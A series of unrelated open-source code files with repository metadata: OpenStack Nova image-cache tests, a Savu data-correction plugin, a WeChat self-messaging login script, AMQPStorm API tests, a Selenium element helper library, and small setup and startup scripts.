{'image_ref': '1',
'host': CONF.host,
'name': 'instance-2',
'uuid': '456',
'vm_state': '',
'task_state': ''}]
all_instances = []
for instance in instances:
all_instances.append(fake_instance.fake_instance_obj(
None, **instance))
def touch(filename):
f = open(filename, 'w')
f.write('Touched')
f.close()
old = time.time() - (25 * 3600)
hashed = 'e97222e91fc4241f49a7f520d1dcf446751129b3'
base_filename = os.path.join(tmpdir, hashed)
touch(base_filename)
touch(base_filename + '.info')
os.utime(base_filename + '.info', (old, old))
touch(base_filename + '.info')
os.utime(base_filename + '.info', (old, old))
self.mox.StubOutWithMock(
objects.block_device.BlockDeviceMappingList,
'get_by_instance_uuid')
ctxt = context.get_admin_context()
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '123').AndReturn(None)
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '456').AndReturn(None)
self.mox.ReplayAll()
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.update(ctxt,
all_instances)
self.assertTrue(os.path.exists(base_filename))
self.assertTrue(os.path.exists(base_filename + '.info'))
def test_run_image_cache_manager_pass(self):
was = {'called': False}
def fake_get_all_by_filters(context, *args, **kwargs):
was['called'] = True
instances = []
for x in range(2):
instances.append(fake_instance.fake_db_instance(
image_ref='1',
uuid=x,
name=x,
vm_state='',
task_state=''))
return instances
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.stub_out('nova.db.instance_get_all_by_filters',
fake_get_all_by_filters)
compute = importutils.import_object(CONF.compute_manager)
self.flags(use_local=True, group='conductor')
compute.conductor_api = conductor.API()
ctxt = context.get_admin_context()
compute._run_image_cache_manager_pass(ctxt)
self.assertTrue(was['called'])
def test_store_swap_image(self):
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._store_swap_image('swap_')
image_cache_manager._store_swap_image('swap_123')
image_cache_manager._store_swap_image('swap_456')
image_cache_manager._store_swap_image('swap_abc')
image_cache_manager._store_swap_image('123_swap')
image_cache_manager._store_swap_image('swap_129_')
self.assertEqual(len(image_cache_manager.back_swap_images), 2)
expect_set = set(['swap_123', 'swap_456'])
self.assertEqual(image_cache_manager.back_swap_images, expect_set)
@mock.patch.object(lockutils, 'external_lock')
@mock.patch.object(libvirt_utils, 'update_mtime')
@mock.patch('os.path.exists', return_value=True)
@mock.patch('os.path.getmtime')
@mock.patch('os.remove')
def test_age_and_verify_swap_images(self, mock_remove, mock_getmtime,
mock_exist, mock_mtime, mock_lock):
image_cache_manager = imagecache.ImageCacheManager()
expected_remove = set()
expected_exist = set(['swap_128', 'swap_256'])
image_cache_manager.back_swap_images.add('swap_128')
image_cache_manager.back_swap_images.add('swap_256')
image_cache_manager.used_swap_images.add('swap_128')
def getmtime(path):
return time.time() - 1000000
mock_getmtime.side_effect = getmtime
def removefile(path):
if not path.startswith('/tmp_age_test'):
return os.remove(path)
fn = os.path.split(path)[-1]
expected_remove.add(fn)
expected_exist.remove(fn)
mock_remove.side_effect = removefile
image_cache_manager._age_and_verify_swap_images(None, '/tmp_age_test')
self.assertEqual(1, len(expected_exist))
self.assertEqual(1, len(expected_remove))
self.assertIn('swap_128', expected_exist)
self.assertIn('swap_256', expected_remove)
@mock.patch.object(utils, 'synchronized')
@mock.patch.object(imagecache.ImageCacheManager, '_get_age_of_file',
return_value=(True, 100))
def test_lock_acquired_on_removing_old_enough_files(self, mock_get_age,
mock_synchronized):
base_file = '/tmp_age_test'
lock_path = os.path.join(CONF.instances_path, 'locks')
lock_file = os.path.split(base_file)[-1]
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_old_enough_file(
base_file, 60, remove_sig=False, remove_lock=False)
mock_synchronized.assert_called_once_with(lock_file, external=True,
lock_path=lock_path)
class VerifyChecksumTestCase(test.NoDBTestCase):
def setUp(self):
super(VerifyChecksumTestCase, self).setUp()
self.img = {'container_format': 'ami', 'id': '42'}
self.flags(checksum_base_images=True, group='libvirt')
def _make_checksum(self, tmpdir):
testdata = ('OpenStack Software delivers a massively scalable cloud '
'operating system.')
fname = os.path.join(tmpdir, 'aaa')
info_fname = imagecache.get_info_filename(fname)
with open(fname, 'w') as f:
f.write(testdata)
return fname, info_fname, testdata
def _write_file(self, info_fname, info_attr, testdata):
f = open(info_fname, 'w')
if info_attr == "csum valid":
csum = hashlib.sha1()
csum.update(testdata)
f.write('{"sha1": "%s"}\n' % csum.hexdigest())
elif info_attr == "csum invalid, not json":
f.write('banana')
else:
f.write('{"sha1": "banana"}')
f.close()
def _check_body(self, tmpdir, info_attr):
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname, info_fname, testdata = self._make_checksum(tmpdir)
self._write_file(info_fname, info_attr, testdata)
image_cache_manager = imagecache.ImageCacheManager()
return image_cache_manager, fname
def test_verify_checksum(self):
with utils.tempdir() as tmpdir:
image_cache_manager, fname = self._check_body(tmpdir, "csum valid")
res = image_cache_manager._verify_checksum(self.img, fname)
self.assertTrue(res)
def test_verify_checksum_disabled(self):
self.flags(checksum_base_images=False, group='libvirt')
with utils.tempdir() as tmpdir:
image_cache_manager, fname = self._check_body(tmpdir, "csum valid")
res = image_cache_manager._verify_checksum(self.img, fname)
self.assertIsNone(res)
def test_verify_checksum_invalid_json(self):
with intercept_log_messages() as stream:
with utils.tempdir() as tmpdir:
image_cache_manager, fname = (
self._check_body(tmpdir, "csum invalid, not json"))
res = image_cache_manager._verify_checksum(
self.img, fname, create_if_missing=False)
self.assertFalse(res)
log = stream.getvalue()
# NOTE(mikal): this is a skip not a fail because the file is
# present, but is not in valid JSON format and therefore is
# skipped.
self.assertNotEqual(log.find('image verification skipped'), -1)
def test_verify_checksum_invalid_repaired(self):
with utils.tempdir() as tmpdir:
image_cache_manager, fname = (
self._check_body(tmpdir, "csum invalid, not json"))
res = image_cache_manager._verify_checksum(
self.img, fname, create_if_missing=True)
self.assertIsNone(res)
def test_verify_checksum_invalid(self):
with intercept_log_messages() as stream:
with utils.tempdir() as tmpdir:
image_cache_manager, fname = (
self._check_body(tmpdir, "csum invalid, valid json"))
res = image_cache_manager._verify_checksum(self.img, fname)
self.assertFalse(res)
log = stream.getvalue()
self.assertNotEqual(log.find('image verification failed'), -1)
def test_verify_checksum_file_missing(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname, info_fname, testdata = self._make_checksum(tmpdir)
image_cache_manager = imagecache.ImageCacheManager()
res = image_cache_manager._verify_checksum('aaa', fname)
self.assertIsNone(res)
# Checksum requests for a file with no checksum now have the
# side effect of creating the checksum
self.assertTrue(os.path.exists(info_fname))
|
{
"content_hash": "2ead46d7799a4e1a95f87c2c562b84f3",
"timestamp": "",
"source": "github",
"line_count": 994,
"max_line_length": 79,
"avg_line_length": 42.18913480885312,
"alnum_prop": 0.5684853109500191,
"repo_name": "dims/nova",
"id": "62c193be5481ff8d218e2eb9373053e5e4c341be",
"size": "42584",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "nova/tests/unit/virt/libvirt/test_imagecache.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16952469"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "317320"
}
],
"symlink_target": ""
}
|
from dogapi.stats.dog_stats_api import DogStatsApi
|
{
"content_hash": "ffcc575aa46c8b174b97f0cc180e0b98",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 50,
"avg_line_length": 51,
"alnum_prop": 0.8431372549019608,
"repo_name": "DataDog/dogapi",
"id": "e003eb3e87ffde9e6d913eeea78dfd138f488a81",
"size": "51",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/dogapi/stats/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "178128"
},
{
"name": "Ruby",
"bytes": "1606"
}
],
"symlink_target": ""
}
|
"""
.. module:: Timeseries_field_corrections
:platform: Unix
:synopsis: A Plugin to apply a simple dark and flatfield correction to some
raw timeseries data
.. moduleauthor:: Mark Basham <scientificsoftware@diamond.ac.uk>
"""
from savu.data.structures import RawTimeseriesData, ProjectionData
from savu.plugins.cpu_plugin import CpuPlugin
from savu.plugins.plugin import Plugin
from savu.core.utils import logmethod
import numpy as np
from savu.plugins.utils import register_plugin
@register_plugin
class TimeseriesFieldCorrections(Plugin, CpuPlugin):
"""
A Plugin to apply a simple dark and flatfield correction to some
raw timeseries data
"""
def __init__(self):
super(TimeseriesFieldCorrections,
self).__init__("TimeseriesFieldCorrections")
@logmethod
def process(self, data, output, processes, process):
"""
"""
image_key = data.image_key[...]
# pull out the average dark and flat data
dark = None
try:
dark = np.mean(data.data[image_key == 2, :, :], 0)
except:
dark = np.zeros((data.data.shape[1], data.data.shape[2]))
flat = None
try:
flat = np.mean(data.data[image_key == 1, :, :], 0)
except:
flat = np.ones((data.data.shape[1], data.data.shape[2]))
# shortcut to reduce processing
flat = flat - dark
# get a list of all the frames
projection_frames = np.arange(len(image_key))[image_key == 0]
output_frames = np.arange(len(projection_frames))
frames = np.array_split(output_frames, len(processes))[process]
# The rotation angle can just be pulled out of the file so write that
rotation_angle = data.rotation_angle[image_key == 0]
output.rotation_angle[:] = rotation_angle
for frame in frames:
projection = data.data[projection_frames[frame], :, :]
projection = (projection-dark)/flat # (flat-dark)
output.data[frame, :, :] = projection
def required_resource(self):
"""
This plugin needs to use the CPU to work
:returns: CPU
"""
return "CPU"
def required_data_type(self):
"""
The input for this plugin is RawTimeseriesData
:returns: RawTimeseriesData
"""
return RawTimeseriesData
def output_data_type(self):
"""
The output of this plugin is ProjectionData
:returns: ProjectionData
"""
return ProjectionData
|
{
"content_hash": "107ac61da7fedba93bc694b917bd0db8",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 78,
"avg_line_length": 29.597701149425287,
"alnum_prop": 0.6139805825242718,
"repo_name": "swtp1v07/Savu",
"id": "938ac19eadee15dd2fd15058c03305826a2e3c4e",
"size": "3165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "savu/plugins/timeseries_field_corrections.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "84400"
},
{
"name": "C++",
"bytes": "509"
},
{
"name": "Makefile",
"bytes": "2126"
},
{
"name": "Python",
"bytes": "349231"
},
{
"name": "Shell",
"bytes": "6321"
}
],
"symlink_target": ""
}
|
from setuptools import find_packages, setup
setup(
name='blocks_extras',
install_requires=['blocks'],
packages=find_packages(),
scripts=['bin/blocks-plot', 'bin/blocks-controller'],
extras_require={'plot': ['bokeh']},
zip_safe=False
)
|
{
"content_hash": "181596c23aea4b20a85abcc4dacb75ff",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 57,
"avg_line_length": 26,
"alnum_prop": 0.6615384615384615,
"repo_name": "mila-udem/blocks-extras",
"id": "918342300e1ec06de984ea080ca0e69ca776d5e6",
"size": "260",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88105"
}
],
"symlink_target": ""
}
|
import os, sys, platform
import requests, time, re, subprocess
import json, xml.dom.minidom
BASE_URL = 'https://login.weixin.qq.com'
OS = platform.system()
INTERACT_URL = None
session = requests.Session()
uuid = None
baseRequest = {}
def get_QRuuid():
url = '%s/jslogin'%BASE_URL
params = {
'appid': 'wx782c26e4c19acffb',
'fun': 'new',
}
r = session.get(url, params = params)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200': return data.group(2)
def get_QR():
url = '%s/qrcode/%s'%(BASE_URL, uuid)
r = session.get(url, stream = True)
with open('QR.jpg', 'wb') as f: f.write(r.content)
if OS == 'Darwin':
subprocess.call(['open', 'QR.jpg'])
elif OS == 'Linux':
subprocess.call(['xdg-open', 'QR.jpg'])
else:
os.startfile('QR.jpg')
def check_login(uuid):
url = '%s/cgi-bin/mmwebwx-bin/login'%BASE_URL
payloads = 'tip=1&uuid=%s&_=%s'%(uuid, int(time.time()))
r = session.get(url, params = payloads)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if not data: return False
def one_line_print(msg):
sys.stdout.write('%s\r'%msg)
sys.stdout.flush()
if data.group(1) == '200':
regx = r'window.redirect_uri="(\S+)";'
global INTERACT_URL
INTERACT_URL = re.search(regx, r.text).group(1)
r = session.get(INTERACT_URL, allow_redirects=False)
INTERACT_URL = INTERACT_URL[:INTERACT_URL.rfind('/')]
get_login_info(r.text)
return True
elif data.group(1) == '201':
one_line_print('Please press confirm')
elif data.group(1) == '408':
one_line_print('Please reload QR Code')
return False
def get_login_info(s):
global baseRequest
for node in xml.dom.minidom.parseString(s).documentElement.childNodes:
if node.nodeName == 'skey':
baseRequest['Skey'] = node.childNodes[0].data.encode('utf8')
elif node.nodeName == 'wxsid':
baseRequest['Sid'] = node.childNodes[0].data.encode('utf8')
elif node.nodeName == 'wxuin':
baseRequest['Uin'] = node.childNodes[0].data.encode('utf8')
elif node.nodeName == 'pass_ticket':
baseRequest['DeviceID'] = node.childNodes[0].data.encode('utf8')
def web_init():
url = '%s/webwxinit?r=%s' % (INTERACT_URL, int(time.time()))
payloads = {
'BaseRequest': baseRequest,
}
headers = { 'ContentType': 'application/json; charset=UTF-8' }
r = session.post(url, data = json.dumps(payloads), headers = headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
return dic['User']['UserName']
def send_msg(toUserName = None, msg = 'Test Message'):
url = '%s/webwxsendmsg'%INTERACT_URL
payloads = {
'BaseRequest': baseRequest,
'Msg': {
'Type': 1,
'Content': msg.encode('utf8') if isinstance(msg, unicode) else msg,
'FromUserName': myUserName.encode('utf8'),
'ToUserName': (toUserName if toUserName else myUserName).encode('utf8'),
'LocalID': int(time.time()),
'ClientMsgId': int(time.time()),
},
}
headers = { 'ContentType': 'application/json; charset=UTF-8' }
session.post(url, data = json.dumps(payloads, ensure_ascii = False), headers = headers)
if __name__ == '__main__':
while uuid is None: uuid = get_QRuuid()
get_QR()
print 'QR is shown'
while not check_login(uuid): pass
myUserName = web_init()
print 'Login successfully you can send messages now, input q to exit'
msg = None
while msg != 'q':
if msg: send_msg(myUserName, msg)
msg = raw_input('>').decode(sys.stdin.encoding)
print 'Have fun:)'
|
{
"content_hash": "763102ffb5ee11f1e87f95e0e681b5bd",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 91,
"avg_line_length": 35.93693693693694,
"alnum_prop": 0.5695663073451993,
"repo_name": "littlecodersh/EasierLife",
"id": "af4c2b2a83026705267e9fd2eb08acf8856b8601",
"size": "4003",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Scripts/SendToMyself.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "88"
},
{
"name": "Python",
"bytes": "105731"
}
],
"symlink_target": ""
}
|
from amqpstorm.management import ApiError
from amqpstorm.management import ManagementApi
from amqpstorm.tests import HTTP_URL
from amqpstorm.tests import PASSWORD
from amqpstorm.tests import USERNAME
from amqpstorm.tests.utility import TestFunctionalFramework
from amqpstorm.tests.utility import setup
class ApiExchangeFunctionalTests(TestFunctionalFramework):
def test_api_exchange_get(self):
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
self.assertIsInstance(api.exchange.get('amq.direct'), dict)
def test_api_exchange_list(self):
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
exchanges = api.exchange.list()
self.assertIsInstance(exchanges, list)
self.assertGreater(len(exchanges), 0)
for exchange in exchanges:
self.assertIsInstance(exchange, dict)
self.assertIn('name', exchange)
self.assertIn('type', exchange)
self.assertIn('auto_delete', exchange)
def test_api_exchange_list_all(self):
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
exchanges = api.exchange.list(show_all=True)
self.assertIsInstance(exchanges, list)
self.assertGreater(len(exchanges), 0)
for exchange in exchanges:
self.assertIsInstance(exchange, dict)
self.assertIn('name', exchange)
self.assertIn('type', exchange)
self.assertIn('auto_delete', exchange)
@setup(new_connection=False, exchange=True)
def test_api_exchange_declare(self):
exchange_type = 'direct'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
self.assertIsNone(api.exchange.declare(self.exchange_name,
exchange_type,
passive=False,
durable=True))
result = api.exchange.get(self.exchange_name)
self.assertIsInstance(result, dict)
self.assertEqual(result['name'], self.exchange_name)
self.assertEqual(result['type'], exchange_type)
self.assertEqual(result['auto_delete'], False)
self.assertEqual(result['durable'], True)
def test_api_exchange_declare_passive(self):
exchange = 'test_queue_declare_passive'
expected_error_message = (
'NOT-FOUND - The client attempted to work '
'with a server entity that does not exist.'
)
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
try:
api.exchange.declare(exchange, passive=True)
except ApiError as why:
self.assertEqual(str(why), expected_error_message)
self.assertEqual(why.error_type, 'NOT-FOUND')
self.assertEqual(why.error_code, 404)
def test_api_exchange_declare_passive_exists(self):
exchange = 'test_queue_declare_passive_exists'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
api.exchange.declare(exchange)
self.assertIsNotNone(api.exchange.declare(exchange, passive=True))
@setup(new_connection=False, exchange=True)
def test_api_exchange_delete(self):
exchange_type = 'direct'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
api.exchange.declare(self.exchange_name,
exchange_type,
passive=False,
durable=True)
self.assertIsNone(api.exchange.delete(self.exchange_name))
self.assertRaisesRegexp(
ApiError,
'NOT-FOUND - The client attempted to work '
'with a server entity that does not exist.',
api.exchange.get, self.exchange_name
)
def test_api_exchange_bind_and_unbind(self):
source_name = 'amq.match'
destination_name = 'amq.direct'
routing_key = 'travis-ci'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
bindings = len(api.exchange.bindings(source_name))
self.assertIsNone(api.exchange.bind(source=source_name,
destination=destination_name,
routing_key=routing_key,
arguments=None))
self.assertEqual(len(api.exchange.bindings(source_name)),
bindings + 1)
self.assertIsNone(api.exchange.unbind(source=source_name,
destination=destination_name,
routing_key=routing_key))
self.assertEqual(len(api.exchange.bindings(source_name)), bindings)
|
{
"content_hash": "9a6b7484c901ea69dec1634d82d6e600",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 75,
"avg_line_length": 37.22222222222222,
"alnum_prop": 0.6042643923240938,
"repo_name": "eandersson/amqp-storm",
"id": "ad5a802709c31d712a9b0fa14eb6dd084cb9d14f",
"size": "4690",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "amqpstorm/tests/functional/management/exchange_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "159150"
}
],
"symlink_target": ""
}
|
"""sda.element
.. codeauthor:: John Lane <jlane@fanthreesixty.com>
"""
from __future__ import unicode_literals
import keyword
from six import string_types
from lxml.cssselect import CSSSelector, SelectorError
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.common.exceptions import InvalidSelectorException, TimeoutException, NoSuchElementException
__all__ = ['Element', 'normalize', 'join']
DEFAULT_NAME_ATTR = 'data-qa-id'
DEFAULT_TYPE_ATTR = 'data-qa-model'
def normalize(_by, path, *args, **kwargs):
"""Convert all paths into a xpath selector
:param str _by: Selenium selector
:param str path: Selector value
:param args:
:param kwargs:
:return:
"""
if args or kwargs:
pass
xpath = '/descendant-or-self::*[{}]'
normalizers = dict([
('class name', lambda x: xpath.format('contains(@class, "%s")' % x)),
('id', lambda x: xpath.format('@id="%s"' % x)),
('link text', lambda x: xpath.format('contains("input a button", name()) and '
'normalize-space(text()) = "%s"' % x)),
('name', lambda x: xpath.format('@name="%s"' % x)),
('partial link text', lambda x: xpath.format('contains("input a button", name()) and '
'contains(normalize-space(text()), "%s")' % x)),
('tag name', lambda x: '/descendant-or-self::%s' % x),
('xpath', lambda x: x)
])
if _by == 'css selector':
try:
return By.XPATH, '/%s' % CSSSelector(str(path)).path
except SelectorError:
return By.XPATH, ''
elif _by == 'element':
if isinstance(path, Element):
return path.search_term
else:
return By.XPATH, normalizers.get(_by, lambda x: '')(str(path))
def join(*args):
"""Join 'x' locator paths into a single path
:param args: Locator path tuples (by, path)
:return: Locator path
:rtype: str
"""
return By.XPATH, ''.join([normalize(*item)[1] for item in args if isinstance(item, (list, tuple))])
class SeleniumObject(object):
"""The SeleniumObject implementation
"""
def __init__(self, web_driver, **kwargs):
self.driver = web_driver if isinstance(web_driver, WebDriver) else None
if not self.driver:
raise TypeError("'web_driver' MUST be a selenium WebDriver element")
if 'name_attr' in kwargs:
self._name_attr = kwargs['name_attr'] \
if isinstance(kwargs['name_attr'], string_types) else DEFAULT_NAME_ATTR
else:
self._name_attr = DEFAULT_NAME_ATTR
if 'type_attr' in kwargs:
self._name_attr = kwargs['type_attr'] \
if isinstance(kwargs['type_attr'], string_types) else DEFAULT_TYPE_ATTR
else:
self._type_attr = DEFAULT_TYPE_ATTR
def _wait_until(self, expected_condition, _by, path, timeout=30):
"""Wait until expected condition is fulfilled
:param func expected_condition: Selenium expected condition
:param str _by: Selector method
:param str path: Selector path
:param timeout: Wait timeout in seconds
:return:
:rtype: bool
"""
wait = WebDriverWait(self.driver, timeout) if isinstance(timeout, int) else WebDriverWait(self.driver, 30)
try:
if _by != 'element':
wait.until(expected_condition((_by, path)))
return True
except TimeoutException:
pass
return False
def wait_until_present(self, _by, path, timeout=30):
"""Wait until the element is available to the DOM
:param str _by: Selector method
:param str path: Selector path
:param timeout: Wait timeout in seconds
:return:
:rtype: bool
"""
return self._wait_until(ec.presence_of_element_located, _by, path, timeout)
def wait_until_appears(self, _by, path, timeout=30):
"""Wait until the element appears
:param str _by: Selector method
:param str path: Selector path
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.visibility_of_element_located, _by, path, timeout)
def wait_until_disappears(self, _by, path, timeout=30):
"""Wait until the element disappears
:param str _by: Selector method
:param str path: Selector path
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.invisibility_of_element_located, _by, path, timeout)
def wait_implicitly(self, seconds):
"""Wait a set amount of time in seconds
:param int seconds: Seconds to wait
:return:
:rtype: bool
"""
if isinstance(seconds, int):
self.driver.implicitly_wait(seconds)
return True
return False
class Element(object):
"""The Element implementation
An abstract class for interacting with web elements. Example use below:
Example file structure:
my_project
- __init__.py
- main.py
- my_web_page
- __init__.py
- fixtures.py
- locators.py
- page.py
The following example demonstrates a user creating a custom fixture (SomeElement) for an element on their web page,
using a locator class to store the selenium selector and implement a web page view to interact with that web page
and its elements:
fixtures.py
.. code-block:: python
from selenium_data_attributes.element import Element
from selenium_data_attributes.mixins import ClickMixin
class SomeElement(Element, ClickMixin):
pass
locators.py
.. code-block:: python
from selenium_data_attributes.locators import Locators
from selenium.webdriver.common.by import By
class MyWebLocators(Locators):
EXAMPLE_BUTTON = (By.XPATH, '//some//path[@id="id_example"])
page.py
.. code-block:: python
from selenium_data_attributes.page import Page
from my_project.my_web_page.fixtures import SomeElement
from my_project.my_web_page.locators import MyWebLocators
class MyWebPage(Page):
def __init__(self, web_driver):
self.driver = web_driver
self.example_button = SomeElement(driver, *MyWebLocators.EXAMPLE_BUTTON)
main.py
.. code-block:: python
from my_project.my_web_page.page import MyWebPage
from selenium import webdriver
# Instantiate web driver
wd = webdriver.Firefox()
web_page = MyWebPage(wd)
web_page.example_button.click()
"""
def __init__(self, web_driver, by=By.XPATH, path=None, **kwargs):
"""Basic Selenium element
:param WebDriver web_driver: Selenium web driver
:param str by: By selector
:param str path: selection value
:return:
"""
self.driver = web_driver if isinstance(web_driver, WebDriver) else None
if not self.driver:
raise TypeError("'web_driver' MUST be a selenium WebDriver element")
# Instantiate selector
self.search_term = normalize(_by=by, path=path)
# Add any additional attributes
for extra in kwargs:
self.__setattr__(extra, kwargs[extra])
def __contains__(self, attribute):
"""Returns True if element contains attribute
:param str attribute: Element attribute
:return: True, if the element contains that attribute
:rtype: bool
"""
if self.exists() and isinstance(attribute, string_types):
try:
self.driver.find_element(*join(self.search_term, ('xpath', '/self::*[boolean(@{})]'.format(attribute))))
return True
except NoSuchElementException:
pass
return False
def __getattr__(self, attribute):
"""Returns the value of an attribute
.. note:: class and for are both reserved keywords. Prepend/post-pend '_' to reference both.
:param str attribute: Element attribute
:return: Returns the string value
:rtype: str
"""
if self.exists():
replacement = '' if keyword.iskeyword(attribute.replace('_', '')) else '-'
return self.element().get_attribute(attribute.replace('_', replacement))
return ''
def __repr__(self):
"""Returns HTML representation of the element
:return: HTML representation of the element
:rtype: str
"""
return '<{} by={} path={}>'.format(self.__class__.__name__, *self.search_term)
def blur(self):
"""Simulate moving the cursor out of focus of this element.
:return:
"""
return self.driver.execute_script('arguments[0].blur();', self.element()) if self.is_displayed() else None
def css_property(self, prop):
"""Return the value of a CSS property for the element
:param str prop: CSS Property
:return: Value of a CSS property
:rtype: str
"""
return self.element().value_of_css_property(str(prop)) if self.exists() else ''
def drag(self, x_offset=0, y_offset=0):
"""Drag element x,y pixels from its center
:param int x_offset: Pixels to move element to
:param int y_offset: Pixels to move element to
:return:
"""
if self.exists() and isinstance(x_offset, int) and isinstance(y_offset, int):
action = ActionChains(self.driver)
action.click_and_hold(self.element()).move_by_offset(x_offset, y_offset).release().perform()
return True
return False
def element(self):
"""Return the selenium web element object
:return: Selenium WebElement
:rtype: WebElement
"""
# If the search term passed through was an element
if self.search_term[0] == 'element' and isinstance(self.search_term[1], WebElement):
return self.search_term[1]
# If the search term is a valid term
elif self.search_term[0] in ('class name', 'css selector', 'id', 'link text',
'name', 'partial link text', 'tag name', 'xpath'):
try:
# Locate element
element = self.driver.find_elements(*self.search_term)
return element[0] if element else None
except InvalidSelectorException:
pass
return None
def exists(self):
"""Returns True if element can be located by selenium
:return: Returns True, if the element can be located
:rtype: bool
"""
return True if self.element() else False
def focus(self):
"""Simulate element being in focus
:return:
"""
return self.driver.execute_script('arguments[0].focus();', self.element()) if self.is_displayed() else None
def html(self):
"""Returns HTML representation of the element
:return: HTML representation of the element
:rtype: str
"""
return self.outerHTML if self.exists() else ''
def is_displayed(self):
"""Return True, if the element is visible
:return: True, if element is visible
:rtype: bool
"""
return self.element().is_displayed() if self.exists() else False
def parent(self):
"""Returns the Selenium element for the current element
:return:
"""
xpath = join(self.search_term, ('xpath', '/parent::*'))
return Element(self.driver, xpath[0], xpath[1])
def scroll_to(self):
"""Scroll to the location of the element
:return:
"""
if self.exists():
element = self.element()
script = "var vHeight = Math.max(document.documentElement.clientHeight, window.innerHeight || 0);" \
"var eTop = arguments[0].getBoundingClientRect().top;" \
"window.scrollBy(0, eTop-(vHeight/2));"
# Scroll to Element
self.driver.execute_script(script, element)
@property
def tag_name(self):
"""Returns element tag name
:return: Element tag name
:rtype: str
"""
return self.element().tag_name if self.exists() else ''
def _wait_until(self, expected_condition, timeout=30):
"""Base function for wait functions
:param expected_condition: Expected condition, callable must return boolean
:param int timeout: Seconds before timeout
:return:
"""
wait = WebDriverWait(self.driver, timeout) if isinstance(timeout, int) else WebDriverWait(self.driver, 30)
try:
if self.search_term[0] != 'element' and callable(expected_condition):
wait.until(expected_condition(self.search_term))
return True
except TimeoutException:
return False
def wait_until_present(self, timeout=30):
"""Wait until the element is present
:param timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.presence_of_element_located, timeout)
def wait_until_appears(self, timeout=30):
"""Wait until the element appears
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.visibility_of_element_located, timeout)
def wait_until_disappears(self, timeout=30):
"""Wait until the element disappears
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.invisibility_of_element_located, timeout)
|
{
"content_hash": "2cd425b70fb721ff6217fb4ae8dbc7c2",
"timestamp": "",
"source": "github",
"line_count": 503,
"max_line_length": 120,
"avg_line_length": 28.904572564612327,
"alnum_prop": 0.5983905358002614,
"repo_name": "jlane9/selenium_data_attributes",
"id": "c5f50a130a3a6a3fed6b8fa45fe2b15bc432ed5c",
"size": "14563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sda/element.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "64492"
},
{
"name": "Shell",
"bytes": "991"
}
],
"symlink_target": ""
}
|
import Gaffer
def __scriptAdded( container, script ) :
variables = script["variables"]
if "projectName" not in variables :
projectName = variables.addMember( "project:name", IECore.StringData( "default" ), "projectName" )
projectName["name"].setFlags( Gaffer.Plug.Flags.ReadOnly, True )
if "projectRootDirectory" not in variables :
projectRoot = variables.addMember( "project:rootDirectory", IECore.StringData( "$HOME/gaffer/projects/${project:name}" ), "projectRootDirectory" )
projectRoot["name"].setFlags( Gaffer.Plug.Flags.ReadOnly, True )
__scriptAddedConnection = application.root()["scripts"].childAddedSignal().connect( __scriptAdded )
|
{
"content_hash": "01ec9549f0ddf91ac418c08a0a4f90a1",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 148,
"avg_line_length": 50.53846153846154,
"alnum_prop": 0.7503805175038052,
"repo_name": "paulondc/gaffer",
"id": "b4bb299fbb9bdb4ec3141ccc1d35a92847d81215",
"size": "2474",
"binary": false,
"copies": "4",
